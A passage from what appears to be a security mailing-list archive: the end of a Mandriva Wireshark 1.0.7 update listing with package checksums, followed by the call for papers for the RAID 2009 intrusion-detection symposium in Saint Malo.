2009.0/i586/dumpcap-1.0.7-0.1mdv2009.0.i586.rpm
 50c880fb63f1d29f970e08907eb17e6a  
2009.0/i586/libwireshark0-1.0.7-0.1mdv2009.0.i586.rpm
 aecb17f6c08968009c2943a86b1ac134  
2009.0/i586/libwireshark-devel-1.0.7-0.1mdv2009.0.i586.rpm
 98ddaa9298f0dc2b9d9bcc6746e0a757  
2009.0/i586/rawshark-1.0.7-0.1mdv2009.0.i586.rpm
 ce249c97cf2f80fba97c54f12386b60d  
2009.0/i586/tshark-1.0.7-0.1mdv2009.0.i586.rpm
 fafb35021c36244cb71dd3c3664ada28  
2009.0/i586/wireshark-1.0.7-0.1mdv2009.0.i586.rpm
 b672985920730bc14e03688ac56d6c50  
2009.0/i586/wireshark-tools-1.0.7-0.1mdv2009.0.i586.rpm 
 d5758cdd51c62cf50348b9b868262b1f  
2009.0/SRPMS/wireshark-1.0.7-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 fde0562d4244fcd5c46bd426123bb762  
2009.0/x86_64/dumpcap-1.0.7-0.1mdv2009.0.x86_64.rpm
 a94780e9a7fe2a90fef2ec6f76b1b4d3  
2009.0/x86_64/lib64wireshark0-1.0.7-0.1mdv2009.0.x86_64.rpm
 cab3b23f1c2649c9035f396a6ac5b89a  
2009.0/x86_64/lib64wireshark-devel-1.0.7-0.1mdv2009.0.x86_64.rpm
 1d5d4f151b02eb721b2aa2391bef5b15  
2009.0/x86_64/rawshark-1.0.7-0.1mdv2009.0.x86_64.rpm
 0e80a0db6dc3243f35e18eb0e42ba6b6  
2009.0/x86_64/tshark-1.0.7-0.1mdv2009.0.x86_64.rpm
 596cbc632f8cb9d9bfd817b7e3449d79  
2009.0/x86_64/wireshark-1.0.7-0.1mdv2009.0.x86_64.rpm
 caf11a295f23aad7100719ff3d0afe46  
2009.0/x86_64/wireshark-tools-1.0.7-0.1mdv2009.0.x86_64.rpm 
 d5758cdd51c62cf50348b9b868262b1f  
2009.0/SRPMS/wireshark-1.0.7-0.1mdv2009.0.src.rpm

 Corporate 4.0:
 0fa546e721b3dafeec3c8dd737d5f414  
corporate/4.0/i586/dumpcap-1.0.7-0.1.20060mlcs4.i586.rpm
 b7e8cc21418e0876ea6fabbf5416aff5  
corporate/4.0/i586/libwireshark0-1.0.7-0.1.20060mlcs4.i586.rpm
 710a98dac2c3aaec7c71719e589ebab3  
corporate/4.0/i586/libwireshark-devel-1.0.7-0.1.20060mlcs4.i586.rpm
 327d0395e370053fb419921046bc35de  
corporate/4.0/i586/rawshark-1.0.7-0.1.20060mlcs4.i586.rpm
 7e6f1992ea5affd89c7c22764c4cdaa1  
corporate/4.0/i586/tshark-1.0.7-0.1.20060mlcs4.i586.rpm
 4ea42e9e0ab0d057b730949bb9250dcd  
corporate/4.0/i586/wireshark-1.0.7-0.1.20060mlcs4.i586.rpm
 a6ea90713046fe7d842ee0eb1a2c6157  

Reminder: RAID 2009 CFP

2009-04-09 Thread Corrado Leita
(We apologize if you receive multiple copies of this message)



 CALL FOR PAPERS
RAID 2009

 12th International Symposium on
  Recent Advances in Intrusion Detection 2009

 September 23-25, 2009

 Saint Malo, Brittany, France

http://www.rennes.supelec.fr/RAID2009/




Topics:
---
This symposium, the 12th in an annual series, brings together leading
researchers and practitioners from academia, government, and industry
to discuss issues and technologies related to intrusion detection and
defense. The Recent Advances in Intrusion Detection (RAID)
International Symposium series furthers advances in intrusion defense
by promoting the exchange of ideas in a broad range of topics. As in
previous years, all topics related to intrusion detection, prevention
and defense systems and technologies are within scope, including but
not limited to the following:

* Network and host intrusion detection and prevention
* Anomaly and specification-based approaches
* IDS cooperation and event correlation
* Malware prevention, detection, analysis and containment
* Web application security
* Insider attack detection
* Intrusion response, tolerance, and self protection
* Operational experience and limitations of current approaches
* Intrusion detection assessment and benchmarking
* Attacks against IDS including DoS, evasion, and IDS discovery
* Formal models, analysis, and standards
* Deception systems and honeypots
* Vulnerability analysis, risk assessment, and forensics
* Adversarial machine learning for security
* Visualization techniques
* Special environments, including mobile and sensor networks
* High-performance intrusion detection
* Legal, social, and privacy issues
* Network exfiltration detection
* Botnet analysis, detection, and mitigation

Important Dates:

Paper submission deadline:            April 5, 2009 (Extended until: April 12, 2009, 23.59 PST)
Paper acceptance or rejection:June  8, 2009
Final paper camera ready copy:June 18, 2009
Poster abstract submission deadline:  June 20, 2009
Poster acceptance or rejection:   June 28, 2009

Submissions:

RAID 2009 invites two types of submissions:

1. Full papers presenting mature research results or summarizing
   operational experience protecting or monitoring large real-world
   networks. Papers can be 10-20 pages long and, if accepted, they will
   be presented and included in the RAID 2009 proceedings published by
   Springer Verlag in its Lecture Notes in Computer Science
   (http://www.springer.de/comp/lncs/index.html) series. Papers must be
   formatted according to the instructions provided by Springer Verlag
   (http://www.springer.de/comp/lncs/authors.html), and include an
   abstract and a list of keywords.

2. Posters describing innovative ideas not mature enough for a full
   paper and works in progress. A two-page poster abstract formatted as
   a full paper with an abstract must be submitted. If accepted, it
   will be published in the proceedings and the poster will be presented.

All submissions (papers and poster abstracts) must be submitted
electronically; details will be provided on the conference
web site. Papers should list all authors and their affiliations; in case
of multiple authors, the contact author must be indicated (RAID does not
require anonymized submissions).  For accepted papers, it is required
that at least one of the authors attends the conference to present the
paper. Further questions on the submission process may be sent to the
program chair.  Submissions must not substantially duplicate work that
any of the authors has published elsewhere or has submitted in parallel
to a journal or to any other conference or workshop with proceedings.
Simultaneous submission of the same work to multiple venues, submission
of previously published work, and plagiarism constitute dishonesty or
fraud. RAID, like other scientific and technical conferences and journals,
prohibits these practices and may, on the recommendation of the program
chair, take action against authors who have committed them.

Organizing Committee:
---
General Chair: Ludovic Me (Supelec, France, ludovic...@supelec.fr)
Program Chair: Engin Kirda (Eurecom, France, ki...@eurecom.fr)
Program Co-Chair: Somesh Jha (University of Wisconsin, USA, j...@cs.wisc.edu)
Publication Chair: Davide Balzarotti (Eurecom, France, balzaro...@eurecom.fr)
Publicity Chair: Corrado Leita (Symantec Research Europe, corrado_le...@symantec.com)
Sponsorship Chair: Christophe Bidan (Supelec, France)

Steering Committee:
---
Chair: Marc Dacier (Symantec Research Europe)
Herve Debar (France Telecom RD)
Deborah Frincke (Pacific Northwest National Lab, USA)
Ming-Yuh Huang (The